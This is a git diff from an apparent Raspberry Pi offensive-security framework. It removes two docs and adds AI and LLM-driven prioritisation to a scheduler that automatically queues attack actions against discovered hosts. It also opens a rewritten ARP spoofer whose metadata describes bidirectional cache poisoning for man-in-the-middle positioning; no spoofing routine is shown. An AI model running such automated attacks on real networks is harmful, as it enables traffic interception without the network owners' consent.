- `ai_auto_rollback_window` (50) — decisions before auto-rollback evaluation
- `ai_cold_start_bootstrap_weight` (0.6) — bootstrap vs static heuristic weight
- `circuit_breaker_threshold` (3) — consecutive failures to open circuit
- `manual_mode_auto_scan` (true) — auto-scan in MANUAL mode
- `manual_mode_scan_interval` (180) — seconds between manual mode scans

View File

@@ -1,48 +0,0 @@
# 🔒 Security Policy
Security Policy for **Bjorn** repository includes all required compliance matrix and artifact mapping.
## 🧮 Supported Versions
We provide security updates for the following versions of our project:
| Version | Status | Secure |
| ------- |-------------| ------ |
| 1.0.0 | Development | No |
## 🛡️ Security Practices
- We follow best practices for secure coding and infrastructure management.
- Regular security audits and code reviews are conducted to identify and mitigate potential risks.
- Dependencies are monitored and updated to address known vulnerabilities.
## 📲 Security Updates
- Security updates are released as soon as possible after a vulnerability is confirmed.
- Users are encouraged to update to the latest version to benefit from security fixes.
## 🚨 Reporting a Vulnerability
If you discover a security vulnerability within this project, please follow these steps:
1. **Do not create a public issue.** Instead, contact us directly to responsibly disclose the vulnerability.
2. **Email** [bjorn-cyberviking@outlook.com](mailto:bjorn-cyberviking@outlook.com) with the following information:
- A description of the vulnerability.
- Steps to reproduce the issue.
- Any potential impact or severity.
3. **Wait for a response.** We will acknowledge your report and work with you to address the issue promptly.
## 🛰️ Additional Resources
- [OWASP Security Guidelines](https://owasp.org/)
Thank you for helping us keep this project secure!
---
## 📜 License
2024 - Bjorn is distributed under the MIT License. For more details, please refer to the [LICENSE](LICENSE) file included in this repository.

View File

@@ -1,80 +0,0 @@
# 🐛 Known Issues and Troubleshooting
<p align="center">
<img src="https://github.com/user-attachments/assets/c5eb4cc1-0c3d-497d-9422-1614651a84ab" alt="thumbnail_IMG_0546" width="98">
</p>
## 📚 Table of Contents
- [Current Development Issues](#-current-development-issues)
- [Troubleshooting Steps](#-troubleshooting-steps)
- [License](#-license)
## 🪲 Current Development Issues
### Long Runtime Issue
- **Problem**: `OSError: [Errno 24] Too many open files`
- **Status**: Partially resolved with system limits configuration.
- **Workaround**: Implemented file descriptor limits increase.
- **Monitoring**: Check open files with `lsof -p $(pgrep -f Bjorn.py) | wc -l`
- At the moment the logs show periodically this information as (FD : XXX)
## 🛠️ Troubleshooting Steps
### Service Issues
```bash
#See bjorn journalctl service
journalctl -fu bjorn.service
# Check service status
sudo systemctl status bjorn.service
# View detailed logs
sudo journalctl -u bjorn.service -f
or
sudo tail -f /home/bjorn/Bjorn/data/logs/*
# Check port 8000 usage
sudo lsof -i :8000
```
### Display Issues
```bash
# Verify SPI devices
ls /dev/spi*
# Check user permissions
sudo usermod -a -G spi,gpio bjorn
```
### Network Issues
```bash
# Check network interfaces
ip addr show
# Test USB gadget interface
ip link show usb0
```
### Permission Issues
```bash
# Fix ownership
sudo chown -R bjorn:bjorn /home/bjorn/Bjorn
# Fix permissions
sudo chmod -R 755 /home/bjorn/Bjorn
```
---
## 📜 License
2024 - Bjorn is distributed under the MIT License. For more details, please refer to the [LICENSE](LICENSE) file included in this repository.

View File

@@ -1,4 +1,4 @@
# action_scheduler.py
# action_scheduler.py testsdd
# Smart Action Scheduler for Bjorn - queue-only implementation
# Handles trigger evaluation, requirements checking, and queue management.
#
@@ -24,6 +24,7 @@ from typing import Any, Dict, List, Optional, Tuple
from init_shared import shared_data
from logger import Logger
from ai_engine import get_or_create_ai_engine
logger = Logger(name="action_scheduler.py")
@@ -73,6 +74,8 @@ class ActionScheduler:
# Runtime flags
self.running = True
self.check_interval = 5 # seconds between iterations
self._stop_event = threading.Event()
self._error_backoff = 1.0
# Action definition cache
self._action_definitions: Dict[str, Dict[str, Any]] = {}
@@ -85,6 +88,22 @@ class ActionScheduler:
self._last_source_is_studio: Optional[bool] = None
# Enforce DB invariants (idempotent)
self._ensure_db_invariants()
# Throttling for priorities
self._last_priority_update = 0.0
self._priority_update_interval = 60.0 # seconds
# Initialize AI engine for recommendations ONLY in AI mode.
# Uses singleton so model weights are loaded only once across the process.
self.ai_engine = None
if self.shared_data.operation_mode == "AI":
self.ai_engine = get_or_create_ai_engine(self.shared_data)
if self.ai_engine is None:
logger.info_throttled(
"AI engine unavailable in scheduler; continuing heuristic-only",
key="scheduler_ai_init_failed",
interval_s=300.0,
)
logger.info("ActionScheduler initialized")
@@ -95,40 +114,320 @@ class ActionScheduler:
logger.info("ActionScheduler starting main loop")
while self.running and not self.shared_data.orchestrator_should_exit:
try:
# If the user toggles AI mode at runtime, enable/disable AI engine without restart.
if self.shared_data.operation_mode == "AI" and self.ai_engine is None:
self.ai_engine = get_or_create_ai_engine(self.shared_data)
if self.ai_engine:
logger.info("Scheduler: AI engine enabled (singleton)")
else:
logger.info_throttled(
"Scheduler: AI engine unavailable; staying heuristic-only",
key="scheduler_ai_enable_failed",
interval_s=300.0,
)
elif self.shared_data.operation_mode != "AI" and self.ai_engine is not None:
self.ai_engine = None
# Refresh action cache if needed
self._refresh_cache_if_needed()
# Keep queue consistent with current enable/disable flags.
self._cancel_queued_disabled_actions()
# 1) Promote scheduled actions that are due
# 1) Promote scheduled actions that are due (always — queue hygiene)
self._promote_scheduled_to_pending()
# 2) Publish next scheduled occurrences for interval actions
self._publish_all_upcoming()
# When LLM autonomous mode owns scheduling, skip trigger evaluation
# so it doesn't compete with or duplicate LLM decisions.
# BUT: if the queue is empty, the heuristic scheduler resumes as fallback
# to prevent deadlock when the LLM fails to produce valid actions.
_llm_wants_skip = bool(
self.shared_data.config.get("llm_orchestrator_skip_scheduler", False)
and self.shared_data.config.get("llm_orchestrator_mode") == "autonomous"
and self.shared_data.config.get("llm_enabled", False)
)
_queue_empty = False
if _llm_wants_skip:
try:
row = self.shared_data.db.query_one(
"SELECT COUNT(*) AS cnt FROM action_queue WHERE status IN ('pending','running','scheduled')"
)
_queue_empty = (row and int(row["cnt"]) == 0)
except Exception:
pass
_llm_skip = _llm_wants_skip and not _queue_empty
# 3) Evaluate global on_start actions
self._evaluate_global_actions()
if not _llm_skip:
if _llm_wants_skip and _queue_empty:
logger.info("Scheduler: LLM queue empty — heuristic fallback active")
# 2) Publish next scheduled occurrences for interval actions
self._publish_all_upcoming()
# 4) Evaluate per-host triggers
self.evaluate_all_triggers()
# 3) Evaluate global on_start actions
self._evaluate_global_actions()
# 5) Queue maintenance
# 4) Evaluate per-host triggers
self.evaluate_all_triggers()
else:
logger.debug("Scheduler: trigger evaluation skipped (LLM autonomous owns scheduling)")
# 5) Queue maintenance (always — starvation prevention + cleanup)
self.cleanup_queue()
self.update_priorities()
time.sleep(self.check_interval)
self._error_backoff = 1.0
if self._stop_event.wait(self.check_interval):
break
except Exception as e:
logger.error(f"Error in scheduler loop: {e}")
time.sleep(self.check_interval)
if self._stop_event.wait(self._error_backoff):
break
self._error_backoff = min(self._error_backoff * 2.0, 15.0)
logger.info("ActionScheduler stopped")
# ----------------------------------------------------------------- priorities
def update_priorities(self):
"""
Update priorities of pending actions.
1. Increase priority over time (starvation prevention) with MIN(100) cap.
2. [AI Mode] Boost priority of actions recommended by AI engine.
"""
now = time.time()
if now - self._last_priority_update < self._priority_update_interval:
return
try:
# 1. Anti-starvation aging: +1 per minute for actions waiting >1 hour.
# julianday is portable across all SQLite builds.
# MIN(100) cap prevents unbounded priority inflation.
affected = self.db.execute(
"""
UPDATE action_queue
SET priority = MIN(100, priority + 1)
WHERE status='pending'
AND julianday('now') - julianday(created_at) > 0.0417
"""
)
self._last_priority_update = now
if affected and affected > 0:
logger.debug(f"Aged {affected} pending actions in queue")
# 2. AI Recommendation Boost
if self.shared_data.operation_mode == "AI" and self.ai_engine:
self._apply_ai_priority_boost()
elif self.shared_data.operation_mode == "AI" and not self.ai_engine:
logger.warning("Operation mode is AI, but ai_engine is not initialized!")
except Exception as e:
logger.error(f"Failed to update priorities: {e}")
def _apply_ai_priority_boost(self):
"""Boost priority of actions recommended by AI engine."""
try:
if not self.ai_engine:
logger.warning("AI Boost skipped: ai_engine is None")
return
# Get list of unique hosts with pending actions
hosts = self.db.query("""
SELECT DISTINCT mac_address FROM action_queue
WHERE status='pending'
""")
if not hosts:
return
for row in hosts:
mac = row['mac_address']
if not mac:
continue
# Get available actions for this host
available = [
r['action_name'] for r in self.db.query("""
SELECT DISTINCT action_name FROM action_queue
WHERE mac_address=? AND status='pending'
""", (mac,))
]
if not available:
continue
# Get host context
host_data = self.db.get_host_by_mac(mac)
if not host_data:
continue
context = {
'mac': mac,
'hostname': (host_data.get('hostnames') or '').split(';')[0],
'ports': [
int(p) for p in (host_data.get('ports') or '').split(';')
if p.isdigit()
]
}
# Ask AI for recommendation
recommended_action, confidence, debug = self.ai_engine.choose_action(
host_context=context,
available_actions=available,
exploration_rate=0.0 # No exploration in scheduler
)
if not isinstance(debug, dict):
debug = {}
threshold = self._get_ai_confirm_threshold()
if recommended_action and confidence >= threshold: # Only boost if confident
# Boost recommended action
boost_amount = int(20 * confidence) # Scale boost by confidence
affected = self.db.execute("""
UPDATE action_queue
SET priority = priority + ?
WHERE mac_address=? AND action_name=? AND status='pending'
""", (boost_amount, mac, recommended_action))
if affected and affected > 0:
# NEW: Update metadata to reflect AI influence
try:
# We fetch all matching IDs to update their metadata
rows = self.db.query("""
SELECT id, metadata FROM action_queue
WHERE mac_address=? AND action_name=? AND status='pending'
""", (mac, recommended_action))
for row in rows:
meta = json.loads(row['metadata'] or '{}')
meta['decision_method'] = f"ai_boosted ({debug.get('method', 'unknown')})"
meta['decision_origin'] = "ai_boosted"
meta['decision_scope'] = "priority_boost"
meta['ai_confidence'] = confidence
meta['ai_threshold'] = threshold
meta['ai_method'] = str(debug.get('method', 'unknown'))
meta['ai_recommended_action'] = recommended_action
meta['ai_model_loaded'] = bool(getattr(self.ai_engine, "model_loaded", False))
meta['ai_reason'] = "priority_boost_applied"
meta['ai_debug'] = debug # Includes all_scores and input_vector
self.db.execute("UPDATE action_queue SET metadata=? WHERE id=?",
(json.dumps(meta), row['id']))
except Exception as meta_e:
logger.error(f"Failed to update metadata for AI boost: {meta_e}")
logger.info(
f"[AI_BOOST] action={recommended_action} mac={mac} boost={boost_amount} "
f"conf={float(confidence):.2f} thr={float(threshold):.2f} "
f"method={debug.get('method', 'unknown')}"
)
except Exception as e:
logger.error(f"Error applying AI priority boost: {e}")
def stop(self):
"""Stop the scheduler."""
logger.info("Stopping ActionScheduler...")
self.running = False
self._stop_event.set()
# --------------------------------------------------------------- definitions
def _get_ai_confirm_threshold(self) -> float:
"""Return normalized AI confirmation threshold in [0.0, 1.0]."""
try:
raw = float(getattr(self.shared_data, "ai_confirm_threshold", 0.3))
except Exception:
raw = 0.3
return max(0.0, min(1.0, raw))
def _annotate_decision_metadata(
self,
metadata: Dict[str, Any],
action_name: str,
context: Dict[str, Any],
decision_scope: str,
) -> None:
"""
Fill metadata with a consistent decision trace:
decision_method/origin + AI method/confidence/threshold/reason.
"""
metadata.setdefault("decision_method", "heuristic")
metadata.setdefault("decision_origin", "heuristic")
metadata["decision_scope"] = decision_scope
threshold = self._get_ai_confirm_threshold()
metadata["ai_threshold"] = threshold
if self.shared_data.operation_mode != "AI":
metadata["ai_reason"] = "ai_mode_disabled"
return
if not self.ai_engine:
metadata["ai_reason"] = "ai_engine_unavailable"
return
try:
recommended, confidence, debug = self.ai_engine.choose_action(
host_context=context,
available_actions=[action_name],
exploration_rate=0.0,
)
ai_method = str((debug or {}).get("method", "unknown"))
confidence_f = float(confidence or 0.0)
model_loaded = bool(getattr(self.ai_engine, "model_loaded", False))
metadata["ai_method"] = ai_method
metadata["ai_confidence"] = confidence_f
metadata["ai_recommended_action"] = recommended or ""
metadata["ai_model_loaded"] = model_loaded
if recommended == action_name and confidence_f >= threshold:
metadata["decision_method"] = f"ai_confirmed ({ai_method})"
metadata["decision_origin"] = "ai_confirmed"
metadata["ai_reason"] = "recommended_above_threshold"
elif recommended != action_name:
metadata["decision_origin"] = "heuristic"
metadata["ai_reason"] = "recommended_different_action"
else:
metadata["decision_origin"] = "heuristic"
metadata["ai_reason"] = "confidence_below_threshold"
except Exception as e:
metadata["ai_reason"] = "ai_check_failed"
logger.debug(f"AI decision annotation failed for {action_name}: {e}")
def _log_queue_decision(
self,
action_name: str,
mac: str,
metadata: Dict[str, Any],
target_port: Optional[int] = None,
target_service: Optional[str] = None,
) -> None:
"""Emit a compact, explicit queue-decision log line."""
decision = str(metadata.get("decision_method", "heuristic"))
origin = str(metadata.get("decision_origin", "heuristic"))
ai_method = str(metadata.get("ai_method", "n/a"))
ai_reason = str(metadata.get("ai_reason", "n/a"))
ai_conf = metadata.get("ai_confidence")
ai_thr = metadata.get("ai_threshold")
scope = str(metadata.get("decision_scope", "unknown"))
conf_txt = f"{float(ai_conf):.2f}" if isinstance(ai_conf, (int, float)) else "n/a"
thr_txt = f"{float(ai_thr):.2f}" if isinstance(ai_thr, (int, float)) else "n/a"
model_loaded = bool(metadata.get("ai_model_loaded", False))
port_txt = "None" if target_port is None else str(target_port)
svc_txt = target_service if target_service else "None"
logger.info(
f"[QUEUE_DECISION] scope={scope} action={action_name} mac={mac} port={port_txt} service={svc_txt} "
f"decision={decision} origin={origin} ai_method={ai_method} conf={conf_txt} thr={thr_txt} "
f"model_loaded={model_loaded} reason={ai_reason}"
)
# ---------- replace this method ----------
def _refresh_cache_if_needed(self):
"""Refresh action definitions cache if expired or source flipped."""
@@ -160,6 +459,9 @@ class ActionScheduler:
# Build cache (expect same action schema: b_class, b_trigger, b_action, etc.)
self._action_definitions = {a["b_class"]: a for a in actions}
# Runtime truth: orchestrator loads from `actions`, so align b_enabled to it
# even when scheduler uses `actions_studio` as source.
self._overlay_runtime_enabled_flags()
logger.info(f"Refreshed action cache from '{source}': {len(self._action_definitions)} actions")
except AttributeError as e:
@@ -179,6 +481,67 @@ class ActionScheduler:
except Exception as e:
logger.error(f"Failed to refresh action cache: {e}")
def _is_action_enabled(self, action_def: Dict[str, Any]) -> bool:
"""Parse b_enabled robustly across int/bool/string/null values."""
raw = action_def.get("b_enabled", 1)
if raw is None:
return True
if isinstance(raw, bool):
return raw
if isinstance(raw, (int, float)):
return int(raw) == 1
s = str(raw).strip().lower()
if s in {"1", "true", "yes", "on"}:
return True
if s in {"0", "false", "no", "off"}:
return False
try:
return int(float(s)) == 1
except Exception:
# Conservative default: keep action enabled when value is malformed.
return True
def _overlay_runtime_enabled_flags(self):
"""
Override cached `b_enabled` with runtime `actions` table values.
This keeps scheduler decisions aligned with orchestrator loaded actions.
"""
try:
runtime_rows = self.db.list_actions()
runtime_map = {r.get("b_class"): r.get("b_enabled", 1) for r in runtime_rows}
for action_name, action_def in self._action_definitions.items():
if action_name in runtime_map:
action_def["b_enabled"] = runtime_map[action_name]
except Exception as e:
logger.warning(f"Could not overlay runtime b_enabled flags: {e}")
def _cancel_queued_disabled_actions(self):
"""Cancel pending/scheduled queue entries for currently disabled actions."""
try:
disabled = [
name for name, definition in self._action_definitions.items()
if not self._is_action_enabled(definition)
]
if not disabled:
return
placeholders = ",".join("?" for _ in disabled)
affected = self.db.execute(
f"""
UPDATE action_queue
SET status='cancelled',
completed_at=CURRENT_TIMESTAMP,
error_message=COALESCE(error_message, 'disabled_by_config')
WHERE status IN ('scheduled','pending')
AND action_name IN ({placeholders})
""",
tuple(disabled),
)
if affected:
logger.info(f"Cancelled {affected} queued action(s) because b_enabled=0")
except Exception as e:
logger.error(f"Failed to cancel queued disabled actions: {e}")
# ------------------------------------------------------------------ helpers
@@ -248,7 +611,7 @@ class ActionScheduler:
for action in self._action_definitions.values():
if (action.get("b_action") or "normal") != "global":
continue
if int(action.get("b_enabled", 1) or 1) != 1:
if not self._is_action_enabled(action):
continue
trigger = (action.get("b_trigger") or "").strip()
@@ -275,7 +638,7 @@ class ActionScheduler:
for action in self._action_definitions.values():
if (action.get("b_action") or "normal") == "global":
continue
if int(action.get("b_enabled", 1) or 1) != 1:
if not self._is_action_enabled(action):
continue
trigger = (action.get("b_trigger") or "").strip()
@@ -309,6 +672,19 @@ class ActionScheduler:
next_run = _utcnow() if not last else (last + timedelta(seconds=interval))
scheduled_for = _db_ts(next_run)
metadata = {
"interval": interval,
"is_global": True,
"decision_method": "heuristic",
"decision_origin": "heuristic",
}
self._annotate_decision_metadata(
metadata=metadata,
action_name=action_name,
context={"mac": mac, "hostname": "Bjorn-C2", "ports": []},
decision_scope="scheduled_global",
)
inserted = self.db.ensure_scheduled_occurrence(
action_name=action_name,
next_run_at=scheduled_for,
@@ -317,7 +693,7 @@ class ActionScheduler:
priority=int(action_def.get("b_priority", 40) or 40),
trigger="scheduler",
tags=action_def.get("b_tags", []),
metadata={"interval": interval, "is_global": True},
metadata=metadata,
max_retries=int(action_def.get("b_max_retries", 3) or 3),
)
if inserted:
@@ -354,6 +730,23 @@ class ActionScheduler:
next_run = _utcnow() if not last else (last + timedelta(seconds=interval))
scheduled_for = _db_ts(next_run)
metadata = {
"interval": interval,
"is_global": False,
"decision_method": "heuristic",
"decision_origin": "heuristic",
}
self._annotate_decision_metadata(
metadata=metadata,
action_name=action_name,
context={
"mac": mac,
"hostname": (host.get("hostnames") or "").split(";")[0],
"ports": [int(p) for p in (host.get("ports") or "").split(";") if p.isdigit()],
},
decision_scope="scheduled_host",
)
inserted = self.db.ensure_scheduled_occurrence(
action_name=action_name,
next_run_at=scheduled_for,
@@ -362,7 +755,7 @@ class ActionScheduler:
priority=int(action_def.get("b_priority", 40) or 40),
trigger="scheduler",
tags=action_def.get("b_tags", []),
metadata={"interval": interval, "is_global": False},
metadata=metadata,
max_retries=int(action_def.get("b_max_retries", 3) or 3),
)
if inserted:
@@ -382,7 +775,7 @@ class ActionScheduler:
for action in self._action_definitions.values():
if (action.get("b_action") or "normal") != "global":
continue
if int(action.get("b_enabled", 1)) != 1:
if not self._is_action_enabled(action):
continue
trigger = (action.get("b_trigger") or "").strip()
@@ -409,14 +802,13 @@ class ActionScheduler:
continue
# Queue the action
self._queue_global_action(action)
self._last_global_runs[action_name] = time.time()
logger.info(f"Queued global action {action_name}")
if self._queue_global_action(action):
self._last_global_runs[action_name] = time.time()
except Exception as e:
logger.error(f"Error evaluating global actions: {e}")
def _queue_global_action(self, action_def: Dict[str, Any]):
def _queue_global_action(self, action_def: Dict[str, Any]) -> bool:
"""Queue a global action for execution (idempotent insert)."""
action_name = action_def["b_class"]
mac = self.ctrl_mac
@@ -429,12 +821,30 @@ class ActionScheduler:
"requirements": action_def.get("b_requires", ""),
"timeout": timeout,
"is_global": True,
"decision_method": "heuristic",
"decision_origin": "heuristic",
}
# Global context (controller itself)
context = {
"mac": mac,
"hostname": "Bjorn-C2",
"ports": [] # Global actions usually don't target specific ports on controller
}
self._annotate_decision_metadata(
metadata=metadata,
action_name=action_name,
context=context,
decision_scope="queue_global",
)
ai_conf = metadata.get("ai_confidence")
if isinstance(ai_conf, (int, float)) and metadata.get("decision_origin") == "ai_confirmed":
action_def["b_priority"] = int(action_def.get("b_priority", 50) or 50) + int(20 * float(ai_conf))
try:
self._ensure_host_exists(mac)
# Guard with NOT EXISTS to avoid races
self.db.execute(
affected = self.db.execute(
"""
INSERT INTO action_queue (
action_name, mac_address, ip, port, hostname, service,
@@ -463,8 +873,13 @@ class ActionScheduler:
mac,
),
)
if affected and affected > 0:
self._log_queue_decision(action_name=action_name, mac=mac, metadata=metadata)
return True
return False
except Exception as e:
logger.error(f"Failed to queue global action {action_name}: {e}")
return False
# ------------------------------------------------------------- host path
@@ -480,7 +895,7 @@ class ActionScheduler:
continue
# Skip disabled actions
if not int(action_def.get("b_enabled", 1)):
if not self._is_action_enabled(action_def):
continue
trigger = (action_def.get("b_trigger") or "").strip()
@@ -509,7 +924,6 @@ class ActionScheduler:
# Queue the action
self._queue_action(host, action_def, target_port, target_service)
logger.info(f"Queued {action_name} for {mac} (port={target_port}, service={target_service})")
def _resolve_target_port_service(
self, mac: str, host: Dict[str, Any], action_def: Dict[str, Any]
@@ -585,6 +999,32 @@ class ActionScheduler:
"""
self_port = 0 if target_port is None else int(target_port)
# Circuit breaker check (ORCH-01)
if self.db.is_circuit_open(action_name, mac):
logger.debug(f"Circuit breaker open for {action_name}/{mac}, skipping")
return False
# Global concurrency limit check (ORCH-02)
running_count = self.db.count_running_actions()
max_concurrent = int(getattr(self.shared_data, 'semaphore_slots', 5))
if running_count >= max_concurrent:
logger.debug(f"Concurrency limit reached ({running_count}/{max_concurrent}), skipping {action_name}")
return False
# Per-action concurrency limit (ORCH-02)
requires_raw = action_def.get("b_requires", "")
if requires_raw:
try:
req_obj = json.loads(requires_raw) if isinstance(requires_raw, str) else requires_raw
if isinstance(req_obj, dict) and "max_concurrent" in req_obj:
max_per_action = int(req_obj["max_concurrent"])
running_for_action = self.db.count_running_actions(action_name=action_name)
if running_for_action >= max_per_action:
logger.debug(f"Per-action concurrency limit for {action_name} ({running_for_action}/{max_per_action})")
return False
except (json.JSONDecodeError, TypeError, ValueError):
pass
# 0) Duplicate protection (active)
existing = self.db.query(
"""
@@ -640,7 +1080,7 @@ class ActionScheduler:
def _queue_action(
self, host: Dict[str, Any], action_def: Dict[str, Any], target_port: Optional[int], target_service: Optional[str]
):
) -> bool:
"""Queue action for execution (idempotent insert with NOT EXISTS guard)."""
action_name = action_def["b_class"]
mac = host["mac_address"]
@@ -653,11 +1093,29 @@ class ActionScheduler:
"requirements": action_def.get("b_requires", ""),
"is_global": False,
"timeout": timeout,
"decision_method": "heuristic",
"decision_origin": "heuristic",
"ports_snapshot": host.get("ports") or "",
}
context = {
"mac": mac,
"hostname": (host.get("hostnames") or "").split(";")[0],
"ports": [int(p) for p in (host.get("ports") or "").split(";") if p.isdigit()],
}
self._annotate_decision_metadata(
metadata=metadata,
action_name=action_name,
context=context,
decision_scope="queue_host",
)
ai_conf = metadata.get("ai_confidence")
if isinstance(ai_conf, (int, float)) and metadata.get("decision_origin") == "ai_confirmed":
# Apply small priority boost only when AI confirmed this exact action.
action_def["b_priority"] = int(action_def.get("b_priority", 50) or 50) + int(20 * float(ai_conf))
try:
self.db.execute(
affected = self.db.execute(
"""
INSERT INTO action_queue (
action_name, mac_address, ip, port, hostname, service,
@@ -690,8 +1148,19 @@ class ActionScheduler:
self_port,
),
)
if affected and affected > 0:
self._log_queue_decision(
action_name=action_name,
mac=mac,
metadata=metadata,
target_port=target_port,
target_service=target_service,
)
return True
return False
except Exception as e:
logger.error(f"Failed to queue {action_name} for {mac}: {e}")
return False
# ------------------------------------------------------------- last times
@@ -708,7 +1177,11 @@ class ActionScheduler:
)
if row and row[0].get("completed_at"):
try:
return datetime.fromisoformat(row[0]["completed_at"])
val = row[0]["completed_at"]
if isinstance(val, str):
return datetime.fromisoformat(val)
elif isinstance(val, datetime):
return val
except Exception:
return None
return None
@@ -726,7 +1199,11 @@ class ActionScheduler:
)
if row and row[0].get("completed_at"):
try:
return datetime.fromisoformat(row[0]["completed_at"])
val = row[0]["completed_at"]
if isinstance(val, str):
return datetime.fromisoformat(val)
elif isinstance(val, datetime):
return val
except Exception:
return None
return None
@@ -840,19 +1317,7 @@ class ActionScheduler:
except Exception as e:
logger.error(f"Failed to cleanup queue: {e}")
def update_priorities(self):
"""Boost priority for actions waiting too long (anti-starvation)."""
try:
self.db.execute(
"""
UPDATE action_queue
SET priority = MIN(100, priority + 1)
WHERE status='pending'
AND julianday('now') - julianday(created_at) > 0.0417
"""
)
except Exception as e:
logger.error(f"Failed to update priorities: {e}")
# update_priorities is defined above (line ~166); this duplicate is removed.
# =================================================================== helpers ==

Binary file not shown.

Before

Width:  |  Height:  |  Size: 40 KiB

After

Width:  |  Height:  |  Size: 23 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 29 KiB

After

Width:  |  Height:  |  Size: 19 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 114 KiB

After

Width:  |  Height:  |  Size: 20 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 162 KiB

After

Width:  |  Height:  |  Size: 16 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 34 KiB

After

Width:  |  Height:  |  Size: 22 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 33 KiB

After

Width:  |  Height:  |  Size: 22 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 175 KiB

After

Width:  |  Height:  |  Size: 19 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 25 KiB

After

Width:  |  Height:  |  Size: 17 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 178 KiB

After

Width:  |  Height:  |  Size: 19 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 185 KiB

After

Width:  |  Height:  |  Size: 20 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 138 KiB

After

Width:  |  Height:  |  Size: 18 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 70 KiB

After

Width:  |  Height:  |  Size: 7.1 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 76 KiB

After

Width:  |  Height:  |  Size: 6.6 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 2.2 MiB

After

Width:  |  Height:  |  Size: 21 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 172 KiB

After

Width:  |  Height:  |  Size: 19 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 181 KiB

After

Width:  |  Height:  |  Size: 18 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 221 KiB

After

Width:  |  Height:  |  Size: 23 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 181 KiB

After

Width:  |  Height:  |  Size: 19 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 154 KiB

After

Width:  |  Height:  |  Size: 18 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 172 KiB

After

Width:  |  Height:  |  Size: 19 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 159 KiB

After

Width:  |  Height:  |  Size: 17 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 155 KiB

After

Width:  |  Height:  |  Size: 18 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 172 KiB

After

Width:  |  Height:  |  Size: 17 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 137 KiB

After

Width:  |  Height:  |  Size: 15 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 30 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 30 KiB

After

Width:  |  Height:  |  Size: 23 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 27 KiB

After

Width:  |  Height:  |  Size: 24 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 24 KiB

After

Width:  |  Height:  |  Size: 21 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 19 KiB

After

Width:  |  Height:  |  Size: 14 KiB

View File

@@ -1,163 +1,330 @@
# AARP Spoofer by poisoning the ARP cache of a target and a gateway.
# Saves settings (target, gateway, interface, delay) in `/home/bjorn/.settings_bjorn/arpspoofer_settings.json`.
# Automatically loads saved settings if arguments are not provided.
# -t, --target IP address of the target device (overrides saved value).
# -g, --gateway IP address of the gateway (overrides saved value).
# -i, --interface Network interface (default: primary or saved).
# -d, --delay Delay between ARP packets in seconds (default: 2 or saved).
# - First time: python arpspoofer.py -t TARGET -g GATEWAY -i INTERFACE -d DELAY
# - Subsequent: python arpspoofer.py (uses saved settings).
# - Update: Provide any argument to override saved values.
"""
arp_spoofer.py — ARP Cache Poisoning for Man-in-the-Middle positioning.
Ethical cybersecurity lab action for Bjorn framework.
Performs bidirectional ARP spoofing between a target host and the network
gateway. Restores ARP tables on completion or interruption.
SQL mode:
- Orchestrator provides (ip, port, row) for the target host.
- Gateway IP is auto-detected from system routing table or shared config.
- Results persisted to JSON output and logged for RL training.
- Fully integrated with EPD display (progress, status, comments).
"""
import os
import json
import time
import argparse
from scapy.all import ARP, send, sr1, conf
import logging
import json
import subprocess
import datetime
from typing import Dict, Optional, Tuple
from shared import SharedData
from logger import Logger
logger = Logger(name="arp_spoofer.py", level=logging.DEBUG)
# Silence scapy warnings
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
logging.getLogger("scapy").setLevel(logging.ERROR)
# ──────────────────────── Action Metadata ────────────────────────
b_class = "ARPSpoof"
b_module = "arp_spoofer"
b_status = "arp_spoof"
b_port = None
b_service = '[]'
b_trigger = "on_host_alive"
b_parent = None
b_action = "aggressive"
b_category = "network_attack"
b_name = "ARP Spoofer"
b_description = (
"Bidirectional ARP cache poisoning between target host and gateway for "
"MITM positioning. Detects gateway automatically, spoofs both directions, "
"and cleanly restores ARP tables on completion. Educational lab use only."
)
b_author = "Bjorn Team"
b_version = "2.0.0"
b_icon = "ARPSpoof.png"
b_requires = '{"action":"NetworkScanner","status":"success","scope":"global"}'
b_priority = 30
b_cooldown = 3600
b_rate_limit = "2/86400"
b_timeout = 300
b_max_retries = 1
b_stealth_level = 2
b_risk_level = "high"
b_enabled = 1
b_tags = ["mitm", "arp", "network", "layer2"]
b_args = {
"duration": {
"type": "slider", "label": "Duration (s)",
"min": 10, "max": 300, "step": 10, "default": 60,
"help": "How long to maintain the ARP poison (seconds)."
},
"interval": {
"type": "slider", "label": "Packet interval (s)",
"min": 1, "max": 10, "step": 1, "default": 2,
"help": "Delay between ARP poison packets."
},
}
b_examples = [
{"duration": 60, "interval": 2},
{"duration": 120, "interval": 1},
]
b_docs_url = "docs/actions/ARPSpoof.md"
# ──────────────────────── Constants ──────────────────────────────
_DATA_DIR = os.path.join(os.path.dirname(os.path.dirname(os.path.abspath(__file__))), "data")
OUTPUT_DIR = os.path.join(_DATA_DIR, "output", "arp")
b_class = "ARPSpoof"
b_module = "arp_spoofer"
b_enabled = 0
# Folder and file for settings
